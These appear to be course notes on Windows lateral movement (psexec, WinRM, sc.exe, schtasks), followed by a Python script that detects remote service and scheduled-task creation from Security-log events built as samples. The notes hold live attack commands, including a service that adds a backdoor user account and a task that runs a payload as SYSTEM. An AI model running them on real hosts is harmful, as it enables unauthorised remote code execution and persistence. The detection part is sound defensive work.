Spawning Processes Remotely

Psexec

  psexec64.exe \\MACHINE_IP -u Administrator -p Mypass123 -i cmd.exe

Remote Process Creation Using WinRM

  winrs.exe -u:Administrator -p:Mypass123 -r:target cmd

  $username = 'Administrator';
  $password = 'Mypass123';
  $securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
  $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;

  Enter-PSSession -Computername TARGET -Credential $credential

  Invoke-Command -Computername TARGET -Credential $credential -ScriptBlock {whoami}

Remotely Creating Services Using sc

  sc.exe \\TARGET create THMservice binPath= "net user munra Pass123 /add" start= auto
  sc.exe \\TARGET start THMservice

  sc.exe \\TARGET stop THMservice
  sc.exe \\TARGET delete THMservice

Creating Scheduled Tasks Remotely

  schtasks /s TARGET /RU "SYSTEM" /create /tn "THMtask1" /tr "<command/payload to execute>" /sc ONCE /sd 01/01/1970 /st 00:00
  schtasks /s TARGET /run /TN "THMtask1"

  schtasks /S TARGET /TN "THMtask1" /DELETE /F
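Every technique on this page leaves the same footprint on the target: a network (type 3) logon, followed by a service install (psexec, sc.exe) or a scheduled-task creation (schtasks) performed under that logon session. The script below is an added detection example, not part of the original notes, that correlates those events from the Windows Security log: 4624 (logon), 4697 (service installed) and 4698 (scheduled task created) are real event IDs and field names, but the event records are constructed, and the output format, thresholds and function names are this example's own choices. It flags the service with a shell-command binPath and the SYSTEM task from the sections above, and PsExec's default PSEXESVC service, while leaving a locally installed service alone.

```python
"""Correlate Windows Security events to surface services and scheduled tasks
created over a network logon. Added example; the records are constructed."""
import re

# Constructed sample records shaped like Security-log event data (not captured).
SAMPLE_EVENTS = [
    # Network logon (type 3) by Administrator from a remote host.
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "Administrator",
     "TargetLogonId": "0x3e7a1", "IpAddress": "10.10.14.5"},
    # Service installed under that logon; binPath is a command, not a binary.
    {"EventID": 4697, "SubjectLogonId": "0x3e7a1", "ServiceName": "THMservice",
     "ServiceFileName": "net user munra Pass123 /add"},
    # Interactive logon (type 2) by a local user installing an ordinary service.
    {"EventID": 4624, "LogonType": 2, "TargetUserName": "alice",
     "TargetLogonId": "0x51c2", "IpAddress": "-"},
    {"EventID": 4697, "SubjectLogonId": "0x51c2", "ServiceName": "Backup",
     "ServiceFileName": "\"C:\\Program Files\\Backup\\svc.exe\" /service"},
    # Scheduled task created under the network logon, running as SYSTEM.
    {"EventID": 4698, "SubjectLogonId": "0x3e7a1", "TaskName": "\\THMtask1",
     "TaskContent": "<Task><Principals><Principal><UserId>S-1-5-18</UserId>"
                    "</Principal></Principals><Actions><Exec><Command>cmd.exe"
                    "</Command></Exec></Actions></Task>"},
    # PsExec installs its helper as a service named PSEXESVC by default.
    {"EventID": 4697, "SubjectLogonId": "0x3e7a1", "ServiceName": "PSEXESVC",
     "ServiceFileName": "%SystemRoot%\\PSEXESVC.exe"},
]

KNOWN_REMOTE_EXEC_SERVICES = {"PSEXESVC"}


def looks_like_shell_command(image_path: str) -> bool:
    """True when the service image is a bare command (net, cmd, powershell ...)
    rather than a path to an executable. Legitimate services point at a file.
    Note: 'cmd.exe /c ...' still passes, so pair this with the logon signal."""
    stripped = image_path.strip().lstrip('"')
    if not stripped:
        return False
    first = stripped.split()[0]
    return not re.search(r"\\|\.(exe|sys)$", first, re.IGNORECASE)


def runs_as_system(task_content: str) -> bool:
    """4698 TaskContent carries the task XML; S-1-5-18 is the SYSTEM SID."""
    m = re.search(r"<UserId>([^<]+)</UserId>", task_content)
    return bool(m) and m.group(1).strip().upper() in {
        "S-1-5-18", "SYSTEM", "NT AUTHORITY\\SYSTEM"}


def analyze(events):
    """Return findings for services/tasks created by a network (type 3) logon."""
    network_logons = {
        e["TargetLogonId"].lower(): e
        for e in events if e["EventID"] == 4624 and e["LogonType"] == 3
    }
    findings = []
    for e in events:
        logon = network_logons.get(e.get("SubjectLogonId", "").lower())
        if logon is None:
            continue  # local logon or unknown session: not remote creation
        source = f"{logon['TargetUserName']}@{logon['IpAddress']}"
        if e["EventID"] == 4697:
            reasons = ["service installed over network logon"]
            if looks_like_shell_command(e["ServiceFileName"]):
                reasons.append("binPath is a shell command, not an executable")
            if e["ServiceName"].upper() in KNOWN_REMOTE_EXEC_SERVICES:
                reasons.append("known remote-execution helper service name")
            findings.append({"kind": "service", "name": e["ServiceName"],
                             "source": source, "reasons": reasons})
        elif e["EventID"] == 4698:
            reasons = ["scheduled task created over network logon"]
            if runs_as_system(e["TaskContent"]):
                reasons.append("task runs as SYSTEM")
            findings.append({"kind": "task", "name": e["TaskName"],
                             "source": source, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f['kind']}] {f['name']} from {f['source']}: "
              + "; ".join(f["reasons"]))
```

The join key is the logon ID: 4624 records it as TargetLogonId, while 4697 and 4698 record the creating session as SubjectLogonId, so a service or task whose SubjectLogonId matches a type 3 logon was created by something that authenticated over the network. Run against the constructed records, THMservice, \THMtask1 and PSEXESVC are reported and the locally installed Backup service is not.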